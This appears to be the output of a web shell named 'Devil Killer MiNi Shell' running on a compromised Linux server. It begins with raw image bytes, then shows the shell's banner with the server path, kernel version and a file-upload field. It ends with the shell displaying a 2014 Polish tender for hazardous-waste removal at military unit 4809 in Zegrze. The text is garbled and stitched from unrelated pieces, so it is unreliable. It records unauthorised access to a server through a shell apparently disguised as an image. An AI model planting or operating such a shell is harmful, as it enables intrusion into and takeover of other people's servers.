JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141223/418270-N-2014.html

<p class="kh_header"><b>Zegrze: Wykonanie usług polegających na odbiorze, transporcie  i unieszkodliwieniu               lub odzysku odpadów niebezpiecznych i innych niż niebezpieczne z terenów kompleksów wojskowych administrowanych przez Jednostkę Wojskową 4809 w Zegrzu.</b><br>
<b>Numer ogłoszenia: 418270 - 2014; data zamieszczenia: 23.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa  4809 , ul. Juzistek 2, 05-131 Zegrze, woj. mazowieckie, tel. 22 6883896, faks 22 6883868.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.26wog.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług polegających na odbiorze, transporcie  i unieszkodliwieniu               lub odzysku odpadów niebezpiecznych i innych niż niebezpieczne z terenów kompleksów wojskowych administrowanych przez Jednostkę Wojskową 4809 w Zegrzu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usług polegających na odbiorze, transporcie  i unieszkodliwieniu lub odzysku odpadów niebezpiecznych i innych niż niebezpieczne z terenów kompleksów wojskowych administrowanych przez Jednostkę Wojskową 4809 w Zegrzu.
2.Zamawiający podzielił  przedmiot zamówienia Zamówienie na części: ilość części 2. 
Część I - Odbiór, transport  i unieszkodliwienie lub odzysk odpadów niebezpiecznych i innych niż niebezpieczne o kodach: 03 01 04*, 06 04 05*, 06 04 04*, 08 03 14*, 09 01 01*, 09 01 02*, 09 01 04*, 15 01 10*, 15 02 02*,16 01 07*, 16 01 11*, 16 05 06*,16 05 07*, 16 05 08*, 16 06 06*, 17 02 04*, 17 06 01*, 17 06 05*, 03 01 05, 09 01 08, 10 11 03, 15 01 07, 15 01 02, 15 02 03, 16 01 12, 16 05 09, 16 80 01, 17 01 07, 17 02 01, 17 02 02, 17 02 03, 17 03 80,17 09 04, 18 02 01, 18 02 08,19 12 04, 19 12 08 z terenu kompleksów wojskowych administrowanych przez Jednostkę Wojskową 4809 w Zegrzu.
Część II - Odbiór, transport  i unieszkodliwienie lub odzysk odpadów w postaci skratek (kod odpadu 19 08 01), zawartości piaskowników (kod odpadu 19 08 02)
 i osadów ściekowych  (kod odpadu 19 08 05) z oczyszczalni ścieków zlokalizowanych na terenach kompleksów wojskowych Jednostki Wojskowej 4809 w Zegrzu.
3.Szczegółowy opis przedmiotu zamówienia wraz z ilościami określa:
dla Części I - załącznik nr 2 - Formularz cenowy do SIWZ oraz wykaz ilości odpadów wraz z miejscem odbioru - załącznik nr 4 do umowy,
dla Części II - załącznik nr 2a - Formularz cenowy oraz wykaz ilości odpadów wraz z miejscem odbioru - załącznik nr 4 do umowy.
Podane w w/w załącznikach ilości odpadów są ilościami szacunkowymi, które mogą ulec zmianie (zmniejszeniu), natomiast rozliczane będą faktyczne ilości Mg odebranych ilości odpadów.
4.Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć tylko jedną ofertę dla każdej z części lub na całość zamówienia. Pełna oferta częściowa musi zawierać wszystkie pozycje asortymentowe wymienione 
w załącznikach 2 i 2a do SIWZ. 
5.W prowadzonym postępowaniu Zamawiający nie dopuszcza składania ofert wariantowych, tj. oferty przewidującej odmienny niż określony w niniejszej SIWZ sposób wykonania zamówienia.
WYMAGANIA DOTYCZĄCE CZĘŚCI I  ZAMÓWIENIA: 
1.Wykonawca zobowiązany jest do sukcesywnego odbioru odpadów objętych niniejszym przedmiotem zamówienia bezpośrednio z terenów Grup Zabezpieczenia tak, aby nie dopuścić do ich zalegania w miejscach wytwarzania.
WYMAGANIA DOTYCZĄCE CZĘŚCI  II  ZAMÓWIENIA: 
1.Wykonawca zobowiązany jest do sukcesywnego odbioru odpadów objętych niniejszym przedmiotem zamówienia bezpośrednio z terenów kompleksów wojskowych tak, aby nie dopuścić do ich zalegania w miejscach wytwarzania.
2.Odebrane z terenów kompleksów wojskowych odpady w postaci osadów ściekowych Wykonawca zobowiązuje się poddać w całości procesom odzysku lub unieszkodliwienia (np. kompostowanie, termiczne przekształcanie odpadów) 
z wyłączeniem stosowania  rozumianego w oparciu o art. 96 ustawy a dnia 14 grudnia 2012r. o odpadach  (Dz. U. z 2013r., poz.21).
WYMAGANIA DOTYCZĄCE CZĘŚCI  I i II  ZAMÓWIENIA: 
1.Wykonawca zagospodaruje odpady i osady we własnym zakresie.
2.Wykonawca będzie  korzystał ze specjalistycznego sprzętu przeznaczonego do tego 
typu prac.
3.Wykonawca zobowiązany jest do nieodpłatnego podstawienia niezbędnych  pojemników na miejsca wytwarzania odpadów w ilości i o pojemności uzgodnionej 
z Zamawiającym.  Przekazanie podstawionych pojemników pomiędzy Wykonawcą 
a Zamawiającym odbywać się będzie na podstawie spisanego protokołu w siedzibie właściwej Sekcji Obsługi Infrastruktury. Zamawiający ma prawo do żądania wymiany w przypadku podstawienia pojemników uszkodzonych, a zwłaszcza nieszczelnych.
4.Do realizacji przedmiotu umowy Wykonawca zobowiązany jest posiadać wszelkie aktualne i ostateczne zezwolenia, decyzje, zgody oraz uprawnienia wymagane obowiązującymi uregulowaniami prawnymi (kopie decyzji lub zezwoleń Wykonawca zobowiązany jest przedstawić Zamawiającemu). 
5.Wykonawca posiadający zezwolenie wyłącznie na zbieranie odpadów przedstawia aktualne umowy z podmiotami uprawnionymi do prowadzenia unieszkodliwiania  lub odzysku odpadów objętych zamówieniem jak również kopię zezwolenia    na unieszkodliwianie lub odzysk odpadów wydaną dla firmy, z którą zawarł umowę.
6.Wykonawca zobowiązany jest do informowania Zamawiającego o każdorazowych zmianach w zakresie posiadania wymaganych uprawnień stanowiących podstawę do realizacji umowy.
7.Wykonawca w przypadku realizowania przedmiotu umowy przy udziale podwykonawców zobowiązany jest do zawarcia z nimi stosownych umów 
w formie pisemnej pod rygorem nieważności (kopie umów Wykonawca zobowiązany jest przedstawić Zamawiającemu).
8.W przypadku, gdy Wykonawca przewidział do wykonania zamówienia udział podwykonawców ma obowiązek przedstawić Zamawiającemu aktualne 
i ostateczne zezwolenia, decyzje, zgody oraz uprawnienia wymagane obowiązującymi uregulowaniami prawnymi dotyczące realizacji przez podwykonawcę powierzonego zakresu przedmiotu zamówienia.
9.W przypadku przekazywania odebranych odpadów przez Wykonawcę do odzysku lub unieszkodliwienia podwykonawcy, Wykonawca zobowiązany jest uzyskać stosowne potwierdzenie przejęcia odpadów przez podwykonawcę w Karcie Przekazania Odpadów.
10.Dowodem każdorazowego odbioru ilości i rodzaju odpadów będzie spisany protokół pomiędzy Zamawiającym i Wykonawcą lub osobą przez niego upoważnioną (załącznik do umowy) oraz Karta Przekazania Odpadów wykonane przez Wykonawcę w 3 egzemplarzach zgodnie z obowiązującym wzorem określonym w Rozporządzeniu Ministra Środowiska w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów z dnia 8 grudnia 2010 r. (Dz. U. z 2010 r.  poz. 1673).
11.Odbioru i wywozu odpadów z kompleksów wojskowych administrowanych przez Jednostkę Wojskową 4809 w Zegrzu własnym środkiem transportu wraz 
z dostarczeniem ustalonej liczby pojemników przy użyciu własnych specjalistycznych maszyn, urządzeń oraz środków transportu do odbioru odpadów w terminie  nie dłuższym niż 5 dni roboczych licząc od daty otrzymania zawiadomienia od Zamawiającego, odbiór odpadów odbywać się będzie w dni robocze                       od poniedziałku do czwartku w godz. 800-1400, piątek 800- 1200. 
12.Do zachowania w tajemnicy wszelkich pozyskanych informacji niezależnie od wyniku przetargu oraz ponosi z tego tytułu odpowiedzialność.
13.Podania wykazu osób realizujących przedmiot zamówienia tj. imię i nazwisko, adres zamieszkania, nr dokumentu tożsamości, przez kogo wydany i data wydania.
14.Podania wykazu samochodów wyznaczonych do realizacji niniejszego zadania wraz 
z numerami rejestracyjnymi. 
15.Szczegółowe zasady organizacji sposobu odbioru odpadów z miejsc ich wytwarzania Wykonawca, zobowiązany jest uzgadniać z Zamawiającym.
16.Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia - art. 24 ust. 2a..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada:
przedstawi aktualne pozwolenie na zbieranie odpadów lub zezwolenie na przetwarzanie odpadów niebezpiecznych i innych niż niebezpieczne objęte przedmiotem zamówienia na obszarze obejmującym przedmiot zamówienia, wydanego przez właściwy organ administracji publicznej zgodnie z art. 41 ustawy z dnia 14 grudnia 2012r. o odpadach Dz. U. 2013 poz.21.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada doświadczenie zdobyte poprzez wykonanie w okresie  ostatnich 3 lat, a jeżeli okres działalności jest krótszy - w tym okresie, przed upływem terminu składania ofert jednej należycie wykonanej usługi odpowiadającej przedmiotowi niniejszego zamówienia, tj.:
dla Części I - usłudze odbioru i wywozu odpadów niebezpiecznych i innych niż niebezpieczne o wartości nie mniejszej niż  150 000,00 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dokumentów potwierdzających, że usługi te zostały wykonane należycie,
dla Części II - usłudze odbioru i wywozu odpadów w postaci skratek, zawartości piaskowników i osadów ściekowych o wartości nie mniejszej niż  150 000 zł brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dokumentów potwierdzających, że usługi te zostały wykonane należycie.
W przypadku składania ofert na 2 Części, wartość usług nie może być mniejsza niż   300 000 zł brutto. 
Dowodami są:
poświadczenie wystawione przez podmiot na rzecz, którego usługa była wykonana, 
oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a.  
W przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego usługa wskazana w wykazie została wcześniej wykonana, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
W przypadku zamówień realizowanych zrealizowana część zamówienia musi potwierdzać spełnienie warunku wymaganego doświadczenia.
W przypadku składania ofert na dwie części wartość wykonanych usług powinna być suma obu części.
Zamawiający dokona oceny spełniania warunku na podstawie złożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie złożonego przez  Wykonawcę  oświadczenia o spełnieniu warunków udziału w postępowaniu,  wg załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie złożonego przez  Wykonawcę  oświadczenia o spełnieniu warunków udziału w postępowaniu,  wg załącznika nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę  oświadczenia o spełnieniu warunków udziału w postępowaniu, wg załącznika nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Wymagane jest, aby Wykonawca swoją ofertę złożył m.in. na wypełnionym 
i podpisanym:
Formularzu ofertowym - z wykorzystaniem wzoru wg załącznika  nr 1 do SIWZ.
Formularzu cenowym - z wykorzystaniem wzoru wg załącznika nr 2 i 2a odpowiednio dla części zamówienia do SIWZ.
pełnomocnictwo - tylko w sytuacjach określonych w Rozdziale XIII pkt. 5 lub w przypadku składania oferty wspólnej Rozdział V niniejszej SIWZ,
kserokopie aktualnych umów z podmiotami uprawnionymi do prowadzenia unieszkodliwiania  lub odzysku odpadów objętych zamówieniem jak również kopię zezwolenia  na unieszkodliwianie lub odzysk odpadów wydaną dla firmy, z którą zawarł umowę - w przypadku Wykonawcy posiadającego zezwolenie wyłącznie na zbieranie odpadów.
2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
3.Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
4.Do oferty wspólnej Wykonawcy dołączają pełnomocnictwo w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
5.Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp.
6.W formularzu ofertowym Wykonawcy składający ofertę wspólną powinni wpisać dane teleadresowe, na które ma być kierowana korespondencja od Zamawiającego.
7. Sposób składania oświadczeń i dokumentów w ofercie wspólnej: 
a.dokumenty wspólne, takie jak: formularz ofertowy formularz cenowy, oświadczenie o spełnianiu warunków udziału w postępowaniu, dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, itp. - składa pełnomocnik Wykonawców, w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia,
b.jeżeli jednak podmiot występujący wspólnie spółka cywilna na podstawie odrębnych przepisów, dla celów podatkowych lub związanych 
z ubezpieczeniami jest traktowany jako jeden podmiot jedna jednostka organizacyjna dokumenty dotyczące ubezpieczeń, podatków i opłat powinien złożyć dodatkowo ten podmiot,
c.dokumenty dotyczące własnej firmy, takie jak: oświadczenie o braku podstaw do wykluczenia z postępowania oraz dokumenty potwierdzające,że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia - składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia we własnym imieniu,
d.kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców. Zamawiający, dopuszcza również poświadczanie za zgodność z oryginałem kopii dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną zarówno przez lidera - pełnomocnika do reprezentowania wykonawców na podstawie stosownego umocowania w tym zakresie. Lider - pełnomocnik, chcąc właściwie poświadczyć dokumenty partnera za zgodność z oryginałem, powinien posiadać umocowanie do działania w imieniu partnera, w tym także do uwierzytelniania składanych w jego imieniu dokumentów. 
8.Przed podpisaniem umowy w przypadku wyboru najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę regulującą ich współpracę, zawierającą, co najmniej: 
a.zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia oraz solidarnej odpowiedzialności za realizację zamówienia,
b.określenie zakresu działania poszczególnych stron umowy, 
c.czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin odbioru odpadów - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
